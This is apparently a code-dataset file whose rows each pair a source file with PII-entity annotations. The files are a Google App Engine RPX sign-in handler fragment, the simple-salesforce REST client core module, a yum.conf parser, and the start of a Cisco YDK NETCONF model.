#template_vars['page_title'] = 'Sign In with OpenId' + + #if section == 'sdo_logout': + # cook_str = 'sessID=%s; expires=Fri, 31-Dec-1980 23:59:59 GMT; Path=/;' % '' + # self.response.headers.add_header( 'Set-Cookie', + # cook_str + # ) + # self.redirect(""/"") + # return + + + #if section == 'sprofile': + # if not sessID: + # self.redirect(""/signin/"") + # return + #template_vars['welcome'] = True if self.request.get(""welcome"") == '1' else False + #template_vars['page_title'] = 'My Profile' + + + main_template = '%s.html' % (section) + path = '/%s/' % (section) + #template_vars['path'] = path + + + template_path = os.path.join(os.path.dirname(__file__), '../templates/pages/%s' % main_template) + self.response.out.write(template.render(template_path, template_vars)) + + + + ################################################################################################### + ## Post Actions + ################################################################################################### + def post(self, page=None): + + if page == 'rpx': + token = self.request.get('token') + url = 'https://rpxnow.com/api/v2/auth_info' + args = { + 'format': 'json', + 'apiKey': conf.RPX_API_KEY, + 'token': token + } + + r = urlfetch.fetch( url=url, + payload=urllib.urlencode(args), + method=urlfetch.POST, + headers={'Content-Type':'application/x-www-form-urlencoded'} + ) + data = json.loads(r.content) + + if data['stat'] == 'ok': + welcome = 0 + unique_identifier = data['profile']['identifier'] + + q = db.GqlQuery(""select * from Crew where ident= :1"", unique_identifier) + crew = q.get() + if not crew: + crew = Crew(ident=unique_identifier) + crew.name = data['profile']['preferredUsername'] + if data['profile'].has_key('email'): + crew.email = data['profile']['email'] + crew.put() + welcome = 1 + subject = ""New Login: %s"" % crew.name + body = ""New login on schedule"" + else: + subject = ""Return Login: %s"" % crew.name + body = ""New login on schedule"" + + sessID = str(crew.key()) + cook_str = 'crewID=%s; expires=Fri, 31-Dec-2020 23:59:59 GMT; Path=/;' % crew.id() + self.response.headers.add_header( 'Set-Cookie', + cook_str + ) + mail.send_mail( sender = conf.EMAIL, + to = ""Dev dummy@email.com"", + subject = subject, + body = body + ) + self.redirect(""/profile/?welcome=%s"" % welcome) + return + else: + print section, page + #self.redirect(""/"") + + + + + + + + + + + + + + +",4533,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['URL', ""https://rpxnow.com/api/v2/auth_info'""], ['PERSON', ""template_vars['app""], ['URL', 'users.cr'], ['URL', 'users.cr'], ['PERSON', '#'], ['DATE_TIME', '23:59:59 GMT'], ['URL', 'r.co'], ['PERSON', ""data['profile']['identifier""], ['NRP', 'sessID'], ['DATE_TIME', '31-Dec-2020'], ['DATE_TIME', '23:59:59 GMT'], ['PERSON', 'EMAIL'], ['DATE_TIME', '31-Dec-1980'], ['URL', 'app.Co'], ['URL', 'app.mo'], ['URL', 'webapp.Re'], ['URL', 'self.do'], ['URL', 'self.request.co'], ['URL', 'self.request.co'], ['URL', 'db.Gq'], ['URL', 'users.ge'], ['URL', 'self.red'], ['URL', 'self.response.headers.ad'], ['URL', 'self.red'], ['URL', 'self.red'], ['URL', 'self.request.ge'], ['URL', 's.ht'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'self.re'], ['URL', 'template.re'], ['URL', 'self.request.ge'], ['URL', 'db.Gq'], ['URL', 'q.ge'], ['URL', 'crew.na'], ['URL', 'crew.na'], ['URL', 'crew.na'], ['URL', 'crew.ke'], ['URL', 'crew.id'], ['URL', 'self.response.headers.ad'], ['URL', 'mail.se'], ['URL', 'email.com'], ['URL', 'self.red'], ['URL', 'self.red']]" +101,"""""""Core classes and exceptions for Simple-Salesforce"""""" + + +# has to be defined prior to login import +DEFAULT_API_VERSION = '29.0' + + +import requests +import json + +try: + from urlparse import urlparse +except ImportError: + # Python 3+ + from urllib.parse import urlparse +from simple_salesforce.login import SalesforceLogin +from simple_salesforce.util import date_to_iso8601, SalesforceError + +try: + from collections import OrderedDict +except ImportError: + # Python < 2.7 + from ordereddict import OrderedDict + + +class Salesforce(object): + """"""Salesforce Instance + + An instance of Salesforce is a handy way to wrap a Salesforce session + for easy use of the Salesforce REST API. + """""" + def __init__( + self, username=None, password=None, security_token=None, + session_id=None, instance=None, instance_url=None, + organizationId=None, sandbox=False, version=DEFAULT_API_VERSION, + proxies=None, session=None): + """"""Initialize the instance with the given parameters. + + Available kwargs + + Password Authentication: + + * username -- the Salesforce username to use for authentication + * password -- the password for the username + * security_token -- the security token for the username + * sandbox -- True if you want to login to `test.salesforce.com`, False + if you want to login to `login.salesforce.com`. + + Direct Session and Instance Access: + + * session_id -- Access token for this session + + Then either + * instance -- Domain of your Salesforce instance, i.e. `na1.salesforce.com` + OR + * instance_url -- Full URL of your instance i.e. `https://na1.salesforce.com + + Universal Kwargs: + * version -- the version of the Salesforce API to use, for example `29.0` + * proxies -- the optional map of scheme to proxy server + * session -- Custom requests session, created in calling code. This + enables the use of requets Session features not otherwise + exposed by simple_salesforce. + + """""" + + # Determine if the user passed in the optional version and/or sandbox kwargs + self.sf_version = version + self.sandbox = sandbox + self.proxies = proxies + + # Determine if the user wants to use our username/password auth or pass in their own information + if all(arg is not None for arg in (username, password, security_token)): + self.auth_type = ""password"" + + # Pass along the username/password to our login helper + self.session_id, self.sf_instance = SalesforceLogin( + session=session, + username=username, + password=password, + security_token=security_token, + sandbox=self.sandbox, + sf_version=self.sf_version, + proxies=self.proxies) + + elif all(arg is not None for arg in (session_id, instance or instance_url)): + self.auth_type = ""direct"" + self.session_id = session_id + + # If the user provides the full url (as returned by the OAuth interface for + # example) extract the hostname (which we rely on) + if instance_url is not None: + self.sf_instance = urlparse(instance_url).hostname + else: + self.sf_instance = instance + + elif all(arg is not None for arg in (username, password, organizationId)): + self.auth_type = 'ipfilter' + + # Pass along the username/password to our login helper + self.session_id, self.sf_instance = SalesforceLogin( + session=session, + username=username, + password=password, + organizationId=organizationId, + sandbox=self.sandbox, + sf_version=self.sf_version, + proxies=self.proxies) + + else: + raise TypeError( + 'You must provide login information or an instance and token' + ) + + if self.sandbox: + self.auth_site = 'https://test.salesforce.com' + else: + self.auth_site = 'https://login.salesforce.com' + + self.request = session or requests.Session() + self.request.proxies = self.proxies + self.headers = { + 'Content-Type': 'application/json', + 'Authorization': 'Bearer ' + self.session_id, + 'X-PrettyPrint': '1' + } + + self.base_url = ('https://{instance}/services/data/v{version}/' + .format(instance=self.sf_instance, + version=self.sf_version)) + self.apex_url = ('https://{instance}/services/apexrest/' + .format(instance=self.sf_instance)) + + def describe(self): + url = self.base_url + ""sobjects"" + result = self.request.get(url, headers=self.headers) + if result.status_code != 200: + raise SalesforceGeneralError(url, + 'describe', + result.status_code, + result.content) + json_result = result.json(object_pairs_hook=OrderedDict) + if len(json_result) == 0: + return None + else: + return json_result + + # SObject Handler + def __getattr__(self, name): + """"""Returns an `SFType` instance for the given Salesforce object type + (given in `name`). + + The magic part of the SalesforceAPI, this function translates + calls such as `salesforce_api_instance.Lead.metadata()` into fully + constituted `SFType` instances to make a nice Python API wrapper + for the REST API. + + Arguments: + + * name -- the name of a Salesforce object type, e.g. Lead or Contact + """""" + + # fix to enable serialization (https://github.com/heroku/simple-salesforce/issues/60) + if name.startswith('__'): + return super(Salesforce, self).__getattr__(name) + + return SFType(name, self.session_id, self.sf_instance, self.sf_version, self.proxies) + + # User utlity methods + def set_password(self, user, password): + """"""Sets the password of a user + + salesforce dev documentation link: + https://www.salesforce.com/us/developer/docs/api_rest/Content/dome_sobject_user_password.htm + + Arguments: + + * user: the userID of the user to set + * password: the new password + """""" + + url = self.base_url + 'sobjects/User/%s/password' % user + params = { 'NewPassword' : password, } + + result = self.request.post(url, headers=self.headers, data=json.dumps(params)) + + # salesforce return 204 No Content when the request is successful + if result.status_code != 200 and result.status_code != 204: + raise SalesforceGeneralError(url, + 'User', + result.status_code, + result.content) + json_result = result.json(object_pairs_hook=OrderedDict) + if len(json_result) == 0: + return None + else: + return json_result + + def setPassword(self, user, password): + import warnings + warnings.warn( + ""This method has been deprecated. Please use set_password instread."", DeprecationWarning) + return self.set_password(user, password) + + # Generic Rest Function + def restful(self, path, params): + """"""Allows you to make a direct REST call if you know the path + + Arguments: + + * path: The path of the request + Example: sobjects/User/ABC123/password' + * params: dict of parameters to pass to the path + """""" + + url = self.base_url + path + result = self.request.get(url, headers=self.headers, params=params) + if result.status_code != 200: + raise SalesforceGeneralError(url, + path, + result.status_code, + result.content) + json_result = result.json(object_pairs_hook=OrderedDict) + if len(json_result) == 0: + return None + else: + return json_result + + # Search Functions + def search(self, search): + """"""Returns the result of a Salesforce search as a dict decoded from + the Salesforce response JSON payload. + + Arguments: + + * search -- the fully formatted SOSL search string, e.g. + `FIND {Waldo}` + """""" + url = self.base_url + 'search/' + + # `requests` will correctly encode the query string passed as `params` + params = {'q': search} + result = self.request.get(url, headers=self.headers, params=params) + if result.status_code != 200: + raise SalesforceGeneralError(url, + 'search', + result.status_code, + result.content) + json_result = result.json(object_pairs_hook=OrderedDict) + if len(json_result) == 0: + return None + else: + return json_result + + def quick_search(self, search): + """"""Returns the result of a Salesforce search as a dict decoded from + the Salesforce response JSON payload. + + Arguments: + + * search -- the non-SOSL search string, e.g. `Waldo`. This search + string will be wrapped to read `FIND {Waldo}` before being + sent to Salesforce + """""" + search_string = u'FIND {{{search_string}}}'.format(search_string=search) + return self.search(search_string) + + # Query Handler + def query(self, query, **kwargs): + """"""Return the result of a Salesforce SOQL query as a dict decoded from + the Salesforce response JSON payload. + + Arguments: + + * query -- the SOQL query to send to Salesforce, e.g. + `SELECT Id FROM Lead WHERE Email = dummy@email.com""` + """""" + url = self.base_url + 'query/' + params = {'q': query} + # `requests` will correctly encode the query string passed as `params` + result = self.request.get(url, headers=self.headers, params=params, **kwargs) + + if result.status_code != 200: + _exception_handler(result) + + return result.json(object_pairs_hook=OrderedDict) + + def query_more(self, next_records_identifier, identifier_is_url=False, **kwargs): + """"""Retrieves more results from a query that returned more results + than the batch maximum. Returns a dict decoded from the Salesforce + response JSON payload. + + Arguments: + + * next_records_identifier -- either the Id of the next Salesforce + object in the result, or a URL to the + next record in the result. + * identifier_is_url -- True if `next_records_identifier` should be + treated as a URL, False if + `next_records_identifer` should be treated as + an Id. + """""" + if identifier_is_url: + # Don't use `self.base_url` here because the full URI is provided + url = (u'https://{instance}{next_record_url}' + .format(instance=self.sf_instance, + next_record_url=next_records_identifier)) + else: + url = self.base_url + 'query/{next_record_id}' + url = url.format(next_record_id=next_records_identifier) + result = self.request.get(url, headers=self.headers, **kwargs) + + if result.status_code != 200: + _exception_handler(result) + + return result.json(object_pairs_hook=OrderedDict) + + def query_all(self, query, **kwargs): + """"""Returns the full set of results for the `query`. This is a + convenience wrapper around `query(...)` and `query_more(...)`. + + The returned dict is the decoded JSON payload from the final call to + Salesforce, but with the `totalSize` field representing the full + number of results retrieved and the `records` list representing the + full list of records retrieved. + + Arguments + + * query -- the SOQL query to send to Salesforce, e.g. + `SELECT Id FROM Lead WHERE Email = dummy@email.com""` + """""" + def get_all_results(previous_result, **kwargs): + """"""Inner function for recursing until there are no more results. + + Returns the full set of results that will be the return value for + `query_all(...)` + + Arguments: + + * previous_result -- the modified result of previous calls to + Salesforce for this query + """""" + if previous_result['done']: + return previous_result + else: + result = self.query_more(previous_result['nextRecordsUrl'], + identifier_is_url=True, **kwargs) + result['totalSize'] += previous_result['totalSize'] + # Include the new list of records with the previous list + previous_result['records'].extend(result['records']) + result['records'] = previous_result['records'] + # Continue the recursion + return get_all_results(result, **kwargs) + + # Make the initial query to Salesforce + result = self.query(query, **kwargs) + # The number of results might have exceeded the Salesforce batch limit + # so check whether there are more results and retrieve them if so. + return get_all_results(result, **kwargs) + + def apexecute(self, action, method='GET', data=None, **kwargs): + """"""Makes an HTTP request to an APEX REST endpoint + + Arguments: + + * action -- The REST endpoint for the request. + * method -- HTTP method for the request (default GET) + * data -- A dict of parameters to send in a POST / PUT request + * kwargs -- Additional kwargs to pass to `requests.request` + """""" + result = self._call_salesforce(method, self.apex_url + action, + data=json.dumps(data), **kwargs) + + if result.status_code == 200: + try: + response_content = result.json() + except Exception: + response_content = result.text + return response_content + + def _call_salesforce(self, method, url, **kwargs): + """"""Utility method for performing HTTP call to Salesforce. + + Returns a `requests.result` object. + """""" + result = self.request.request(method, url, headers=self.headers, **kwargs) + + if result.status_code >= 300: + _exception_handler(result) + + return result + + +class SFType(object): + """"""An interface to a specific type of SObject"""""" + + def __init__(self, object_name, session_id, sf_instance, sf_version='27.0', proxies=None): + """"""Initialize the instance with the given parameters. + + Arguments: + + * object_name -- the name of the type of SObject this represents, + e.g. `Lead` or `Contact` + * session_id -- the session ID for authenticating to Salesforce + * sf_instance -- the domain of the instance of Salesforce to use + * sf_version -- the version of the Salesforce API to use + * proxies -- the optional map of scheme to proxy server + """""" + self.session_id = session_id + self.name = object_name + self.request = requests.Session() + self.request.proxies = proxies + + self.base_url = (u'https://{instance}/services/data/v{sf_version}/sobjects/{object_name}/' + .format(instance=sf_instance, + object_name=object_name, + sf_version=sf_version)) + + def metadata(self): + """"""Returns the result of a GET to `.../{object_name}/` as a dict + decoded from the JSON payload returned by Salesforce. + """""" + result = self._call_salesforce('GET', self.base_url) + return result.json(object_pairs_hook=OrderedDict) + + def describe(self): + """"""Returns the result of a GET to `.../{object_name}/describe` as a + dict decoded from the JSON payload returned by Salesforce. + """""" + result = self._call_salesforce('GET', self.base_url + 'describe') + return result.json(object_pairs_hook=OrderedDict) + + def describe_layout(self, record_id): + """"""Returns the result of a GET to `.../{object_name}/describe/layouts/` as a + dict decoded from the JSON payload returned by Salesforce. + """""" + result = self._call_salesforce('GET', self.base_url + 'describe/layouts/' + record_id) + return result.json(object_pairs_hook=OrderedDict) + + def get(self, record_id): + """"""Returns the result of a GET to `.../{object_name}/{record_id}` as a + dict decoded from the JSON payload returned by Salesforce. + + Arguments: + + * record_id -- the Id of the SObject to get + """""" + result = self._call_salesforce('GET', self.base_url + record_id) + return result.json(object_pairs_hook=OrderedDict) + + def get_by_custom_id(self, custom_id_field, custom_id): + """"""Returns the result of a GET to `.../{object_name}/{custom_id_field}/{custom_id}` as a + dict decoded from the JSON payload returned by Salesforce. + + Arguments: + + * custom_id_field -- the API name of a custom field that was defined as an External ID + * custom_id - the External ID value of the SObject to get + """""" + custom_url = self.base_url + '{custom_id_field}/{custom_id}'.format( + custom_id_field=custom_id_field, custom_id=custom_id) + result = self._call_salesforce('GET', custom_url) + return result.json(object_pairs_hook=OrderedDict) + + def create(self, data): + """"""Creates a new SObject using a POST to `.../{object_name}/`. + + Returns a dict decoded from the JSON payload returned by Salesforce. + + Arguments: + + * data -- a dict of the data to create the SObject from. It will be + JSON-encoded before being transmitted. + """""" + result = self._call_salesforce('POST', self.base_url, + data=json.dumps(data)) + return result.json(object_pairs_hook=OrderedDict) + + def upsert(self, record_id, data, raw_response=False): + """"""Creates or updates an SObject using a PATCH to + `.../{object_name}/{record_id}`. + + If `raw_response` is false (the default), returns the status code + returned by Salesforce. Otherwise, return the `requests.Response` + object. + + Arguments: + + * record_id -- an identifier for the SObject as described in the + Salesforce documentation + * data -- a dict of the data to create or update the SObject from. It + will be JSON-encoded before being transmitted. + * raw_response -- a boolean indicating whether to return the response + directly, instead of the status code. + """""" + result = self._call_salesforce('PATCH', self.base_url + record_id, + data=json.dumps(data)) + return self._raw_response(result, raw_response) + + def update(self, record_id, data, raw_response=False): + """"""Updates an SObject using a PATCH to + `.../{object_name}/{record_id}`. + + If `raw_response` is false (the default), returns the status code + returned by Salesforce. Otherwise, return the `requests.Response` + object. + + Arguments: + + * record_id -- the Id of the SObject to update + * data -- a dict of the data to update the SObject from. It will be + JSON-encoded before being transmitted. + * raw_response -- a boolean indicating whether to return the response + directly, instead of the status code. + """""" + result = self._call_salesforce('PATCH', self.base_url + record_id, + data=json.dumps(data)) + return self._raw_response(result, raw_response) + + def delete(self, record_id, raw_response=False): + """"""Deletes an SObject using a DELETE to + `.../{object_name}/{record_id}`. + + If `raw_response` is false (the default), returns the status code + returned by Salesforce. Otherwise, return the `requests.Response` + object. + + Arguments: + + * record_id -- the Id of the SObject to delete + * raw_response -- a boolean indicating whether to return the response + directly, instead of the status code. + """""" + result = self._call_salesforce('DELETE', self.base_url + record_id) + return self._raw_response(result, raw_response) + + def deleted(self, start, end): + """"""Use the SObject Get Deleted resource to get a list of deleted records for the specified object. + .../deleted/?start=2013-05-05T00:00:00+00:00&end=2013-05-10T00:00:00+00:00 + + * start -- start datetime object + * end -- end datetime object + """""" + url = self.base_url + 'deleted/?start={start}&end={end}'.format( + start=date_to_iso8601(start), end=date_to_iso8601(end)) + result = self._call_salesforce('GET', url) + return result.json(object_pairs_hook=OrderedDict) + + def updated(self, start, end): + """"""Use the SObject Get Updated resource to get a list of updated (modified or added) + records for the specified object. + + .../updated/?start=2014-03-20T00:00:00+00:00&end=2014-03-22T00:00:00+00:00 + + * start -- start datetime object + * end -- end datetime object + """""" + url = self.base_url + 'updated/?start={start}&end={end}'.format( + start=date_to_iso8601(start), end=date_to_iso8601(end)) + result = self._call_salesforce('GET', url) + return result.json(object_pairs_hook=OrderedDict) + + def _call_salesforce(self, method, url, **kwargs): + """"""Utility method for performing HTTP call to Salesforce. + + Returns a `requests.result` object. + """""" + headers = { + 'Content-Type': 'application/json', + 'Authorization': 'Bearer ' + self.session_id, + 'X-PrettyPrint': '1' + } + result = self.request.request(method, url, headers=headers, **kwargs) + + if result.status_code >= 300: + _exception_handler(result, self.name) + + return result + + def _raw_response(self, response, body_flag): + """"""Utility method for processing the response and returning either the + status code or the response object. + + Returns either an `int` or a `requests.Response` object. + """""" + if not body_flag: + return response.status_code + else: + return response + + +class SalesforceAPI(Salesforce): + """"""Depreciated SalesforceAPI Instance + + This class implements the Username/Password Authentication Mechanism using Arguments + It has since been surpassed by the 'Salesforce' class, which relies on kwargs + + """""" + def __init__(self, username, password, security_token, sandbox=False, + sf_version='27.0'): + """"""Initialize the instance with the given parameters. + + Arguments: + + * username -- the Salesforce username to use for authentication + * password -- the password for the username + * security_token -- the security token for the username + * sandbox -- True if you want to login to `test.salesforce.com`, False + if you want to login to `login.salesforce.com`. + * sf_version -- the version of the Salesforce API to use, for example + ""27.0"" + """""" + import warnings + warnings.warn( + ""Use of login arguments has been depreciated. Please use kwargs"", + DeprecationWarning + ) + + super(SalesforceAPI, self).__init__(username=username, + password=password, + security_token=security_token, + sandbox=sandbox, + version=sf_version) + + +def _exception_handler(result, name=""""): + """"""Exception router. Determines which error to raise for bad results"""""" + try: + response_content = result.json() + except Exception: + response_content = result.text + + exc_map = { + 300: SalesforceMoreThanOneRecord, + 400: SalesforceMalformedRequest, + 401: SalesforceExpiredSession, + 403: SalesforceRefusedRequest, + 404: SalesforceResourceNotFound, + } + exc_cls = exc_map.get(result.status_code, SalesforceGeneralError) + + raise exc_cls(result.url, result.status_code, name, response_content) + + +class SalesforceMoreThanOneRecord(SalesforceError): + """""" + Error Code: 300 + The value returned when an external ID exists in more than one record. The + response body contains the list of matching records. + """""" + message = u""More than one record for {url}. Response content: {content}"" + + +class SalesforceMalformedRequest(SalesforceError): + """""" + Error Code: 400 + The request couldn't be understood, usually becaue the JSON or XML body contains an error. + """""" + message = u""Malformed request {url}. Response content: {content}"" + + +class SalesforceExpiredSession(SalesforceError): + """""" + Error Code: 401 + The session ID or OAuth token used has expired or is invalid. The response + body contains the message and errorCode. + """""" + message = u""Expired session for {url}. Response content: {content}"" + + +class SalesforceRefusedRequest(SalesforceError): + """""" + Error Code: 403 + The request has been refused. Verify that the logged-in user has + appropriate permissions. + """""" + message = u""Request refused for {url}. Response content: {content}"" + + +class SalesforceResourceNotFound(SalesforceError): + """""" + Error Code: 404 + The requested resource couldn't be found. Check the URI for errors, and + verify that there are no sharing issues. + """""" + message = u'Resource {name} Not Found. Response content: {content}' + + def __str__(self): + return self.message.format(name=self.resource_name, + content=self.content) + + +class SalesforceGeneralError(SalesforceError): + """""" + A non-specific Salesforce error. + """""" + message = u'Error Code {status}. Response content: {content}' + + def __str__(self): + return self.message.format(status=self.status, content=self.content) +",27053,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['URL', 'https://na1.salesforce.com'], ['URL', 'https://www.salesforce.com/us/developer/docs/api_rest/Content/dome_sobject_user_password.htm'], ['DATE_TIME', ""'29.0'""], ['URL', 'urllib.pa'], ['NRP', 'OrderedDict'], ['PERSON', 'ordereddict import'], ['PERSON', 'OrderedDict'], ['LOCATION', 'security_token'], ['PERSON', 'simple_salesforce'], ['LOCATION', 'security_token'], ['LOCATION', 'security_token'], ['URL', 'self.au'], ['PERSON', 'self.sf_instance ='], ['URL', 'self.ba'], ['URL', 'self.ba'], ['URL', 'self.request.ge'], ['URL', 'result.st'], ['URL', 'result.st'], ['PERSON', 'json_result = result.json(object_pairs_hook=OrderedDict'], ['LOCATION', 'SalesforceAPI'], ['PERSON', 'name.startswith'], ['LOCATION', 'self.sf_instance'], ['URL', 'self.ba'], ['URL', 'self.re'], ['URL', 'result.st'], ['PERSON', 'json_result = result.json(object_pairs_hook=OrderedDict'], ['URL', 'self.ba'], ['URL', 'self.request.ge'], ['URL', 'result.st'], ['PERSON', 'json_result = result.json(object_pairs_hook=OrderedDict'], ['URL', 'self.ba'], ['URL', 'self.request.ge'], ['URL', 'result.st'], ['PERSON', 'json_result = result.json(object_pairs_hook=OrderedDict'], ['PERSON', 'Waldo'], ['NRP', 'SOQL'], ['URL', 'self.ba'], ['URL', 'self.request.ge'], ['PERSON', 'exception_handler(result'], ['NRP', 'query_more(self'], ['URL', 'self.ba'], ['URL', 'self.ba'], ['URL', 'url.fo'], ['URL', 'self.request.ge'], ['PERSON', 'exception_handler(result'], ['NRP', 'SOQL'], ['NRP', 'previous_result'], ['PERSON', 'exception_handler(result'], ['LOCATION', 'session_id'], ['URL', 'self.ba'], ['URL', 'self.ba'], ['URL', 'self.ba'], ['URL', 'self.ba'], ['URL', 'self.ba'], ['LOCATION', 'custom_id_field'], ['PERSON', 'custom_id_field'], ['URL', 'self.ba'], ['LOCATION', 'custom_id_field'], ['LOCATION', 'custom_id_field'], ['URL', 'self.ba'], ['URL', 'self.ba'], ['URL', 'self.ba'], ['URL', 'self.ba'], ['URL', 'self.ba'], ['URL', 'self.ba'], ['PERSON', 'exception_handler(result'], ['LOCATION', 'security_token'], ['LOCATION', 'security_token'], ['LOCATION', 'security_token'], ['LOCATION', 'security_token'], ['PERSON', 'exception_handler(result'], ['LOCATION', 'SalesforceResourceNotFound'], ['URL', 'result.st'], ['URL', 'https://test.salesforce.com'], ['URL', 'https://login.salesforce.com'], ['URL', 'https://github.com/heroku/simple-salesforce/issues/60'], ['URL', 'test.salesforce.com'], ['URL', 'login.salesforce.com'], ['URL', 'na1.salesforce.com'], ['URL', 'self.sa'], ['URL', 'self.pro'], ['URL', 'self.au'], ['URL', 'self.se'], ['URL', 'self.sa'], ['URL', 'self.pro'], ['URL', 'self.se'], ['URL', 'self.au'], ['URL', 'self.se'], ['URL', 'self.sa'], ['URL', 'self.pro'], ['URL', 'self.sa'], ['URL', 'self.au'], ['URL', 'self.au'], ['URL', 'self.re'], ['URL', 'requests.Se'], ['URL', 'self.request.pro'], ['URL', 'self.pro'], ['URL', 'self.se'], ['URL', 'result.co'], ['URL', 'instance.Lead.me'], ['URL', 'name.st'], ['URL', 'self.se'], ['URL', 'self.pro'], ['URL', 'result.st'], ['URL', 'result.st'], ['URL', 'result.co'], ['URL', 'self.se'], ['URL', 'result.st'], ['URL', 'result.co'], ['URL', 'result.st'], ['URL', 'result.co'], ['URL', 'self.se'], ['URL', 'email.com'], ['URL', 'result.st'], ['URL', 'result.st'], ['URL', 'email.com'], ['URL', 'requests.re'], ['URL', 'result.st'], ['URL', 'requests.re'], ['URL', 'self.request.re'], ['URL', 'result.st'], ['URL', 'self.se'], ['URL', 'self.na'], ['URL', 'self.re'], ['URL', 'requests.Se'], ['URL', 'self.request.pro'], ['URL', 'requests.Re'], ['URL', 'requests.Re'], ['URL', 'requests.Re'], ['URL', 'requests.re'], ['URL', 'self.se'], ['URL', 'self.request.re'], ['URL', 'result.st'], ['URL', 'self.na'], ['URL', 'requests.Re'], ['URL', 'response.st'], ['URL', 'test.salesforce.com'], ['URL', 'login.salesforce.com'], ['URL', 'map.ge'], ['URL', 'result.st'], ['URL', 'self.message.fo'], ['URL', 'self.re'], ['URL', 'self.co'], ['URL', 'self.message.fo'], ['URL', 'self.st'], ['URL', 'self.co']]" +102,""""""" +YumConf - file ``/etc/yum.conf`` +================================ + +This module provides parsing for the ``/etc/yum.conf`` file. +The ``YumConf`` class parses the information in the file +``/etc/yum.conf``. See the ``IniConfigFile`` class for more +information on attributes and methods. + +Sample input data looks like:: + + [main] + + cachedir=/var/cache/yum/$basearch/$releasever + keepcache=0 + debuglevel=2 + logfile=/var/log/yum.log + exactarch=1 + obsoletes=1 + gpgcheck=1 + plugins=1 + installonly_limit=3 + + [rhel-7-server-rpms] + + metadata_expire = 86400 + baseurl = https://cdn.redhat.com/content/rhel/server/7/$basearch + name = Red Hat Enterprise Linux 7 Server (RPMs) + gpgkey = PI:KEY + enabled = 1 + gpgcheck = 1 + +Examples: + + >>> yconf = shared[YumConf] + >>> yconf.defaults() + {'admin_token': 'ADMIN', 'compute_port': '8774'} + >>> 'main' in yconf + True + >>> 'rhel-7-server-rpms' in yconf + True + >>> yconf.has_option('main', 'gpgcheck') + True + >>> yconf.has_option('main', 'foo') + False + >>> yconf.get('rhel-7-server-rpms', 'enabled') + '1' + >>> yconf.items('main') + {'plugins': '1', + 'keepcache': '0', + 'cachedir': '/var/cache/yum/$basearch/$releasever', + 'exactarch': '1', + 'obsoletes': '1', + 'installonly_limit': '3', + 'debuglevel': '2', + 'gpgcheck': '1', + 'logfile': '/var/log/yum.log'} +"""""" + +from insights.contrib.ConfigParser import NoOptionError +from .. import parser, IniConfigFile +from insights.specs import yum_conf + + +@parser(yum_conf) +class YumConf(IniConfigFile): + """"""Parse contents of file ``/etc/yum.conf``."""""" + def parse_content(self, content): + super(YumConf, self).parse_content(content) + # File /etc/yum.conf may contain repos definitions. + # Keywords 'gpgkey' and 'baseurl' might contain multiple + # values separated by comma. Convert those values into a list. + for section in self.sections(): + for key in ('gpgkey', 'baseurl'): + try: + value = self.get(section, key) + if value and isinstance(value, str): + self.data.set(section, key, value.split(',')) + except NoOptionError: + pass +",2282,"[['URL', 'https://cdn.redhat.com/content/rhel/server/7/$basearch'], ['PERSON', 'YumConf'], ['PERSON', 'admin_token'], ['PERSON', 'keepcache'], ['PERSON', 'exactarch'], ['PERSON', 'obsoletes'], ['LOCATION', 'insights.contrib'], ['PERSON', 'Parse'], ['IP_ADDRESS', 'e::\n\n '], ['URL', 'yum.co'], ['URL', 'yum.co'], ['URL', 'yum.co'], ['URL', 'yconf.de'], ['URL', 'yconf.ge'], ['URL', 'yconf.it'], ['URL', 'insights.contrib.Co'], ['URL', 'yum.co'], ['URL', 'yum.co'], ['URL', 'self.se'], ['URL', 'self.ge'], ['URL', 'self.data.se']]" +103,""""""" Cisco_IOS_XR_man_xml_ttyagent_oper + +This module contains a collection of YANG definitions +for Cisco IOS\-XR man\-xml\-ttyagent package operational data. + +This module contains definitions +for the following management objects\: + netconf\: NETCONF operational information + xr\-xml\: xr xml + +Copyright (c) 2013\-2016 by Cisco Systems, Inc. +All rights reserved. + +"""""" + + +import re +import collections + +from enum import Enum + +from ydk.types import Empty, YList, YLeafList, DELETE, Decimal64, FixedBitsDict + +from ydk.errors import YPYError, YPYModelError + + + +class XrXmlSessionAlarmRegisterEnum(Enum): + """""" + XrXmlSessionAlarmRegisterEnum + + AlarmNotify + + .. data:: registered = 1 + + Registered + + .. data:: not_registered = 2 + + NotRegistered + + """""" + + registered = 1 + + not_registered = 2 + + + @staticmethod + def _meta_info(): + from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta + return meta._meta_table['XrXmlSessionAlarmRegisterEnum'] + + +class XrXmlSessionStateEnum(Enum): + """""" + XrXmlSessionStateEnum + + SessionState + + .. data:: idle = 1 + + Idle + + .. data:: busy = 2 + + Busy + + """""" + + idle = 1 + + busy = 2 + + + @staticmethod + def _meta_info(): + from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta + return meta._meta_table['XrXmlSessionStateEnum'] + + + +class Netconf(object): + """""" + NETCONF operational information + + .. attribute:: agent + + NETCONF agent operational information + **type**\: :py:class:`Agent ` + + + + """""" + + _prefix = 'man-xml-ttyagent-oper' + _revision = '2015-07-30' + + def __init__(self): + self.agent = Netconf.Agent() + self.agent.parent = self + + + class Agent(object): + """""" + NETCONF agent operational information + + .. attribute:: tty + + NETCONF agent over TTY + **type**\: :py:class:`Tty ` + + + + """""" + + _prefix = 'man-xml-ttyagent-oper' + _revision = '2015-07-30' + + def __init__(self): + self.parent = None + self.tty = Netconf.Agent.Tty() + self.tty.parent = self + + + class Tty(object): + """""" + NETCONF agent over TTY + + .. attribute:: sessions + + Session information + **type**\: :py:class:`Sessions ` + + + + """""" + + _prefix = 'man-xml-ttyagent-oper' + _revision = '2015-07-30' + + def __init__(self): + self.parent = None + self.sessions = Netconf.Agent.Tty.Sessions() + self.sessions.parent = self + + + class Sessions(object): + """""" + Session information + + .. attribute:: session + + Session information + **type**\: list of :py:class:`Session ` + + + + """""" + + _prefix = 'man-xml-ttyagent-oper' + _revision = '2015-07-30' + + def __init__(self): + self.parent = None + self.session = YList() + self.session.parent = self + self.session.name = 'session' + + + class Session(object): + """""" + Session information + + .. attribute:: session_id + + Session ID + **type**\: int + + **range:** \-2147483648..2147483647 + + .. attribute:: admin_config_session_id + + Admin config session ID + **type**\: str + + .. attribute:: alarm_notification + + is the session registered for alarm notifications + **type**\: :py:class:`XrXmlSessionAlarmRegisterEnum ` + + .. attribute:: client_address + + ip address of the client + 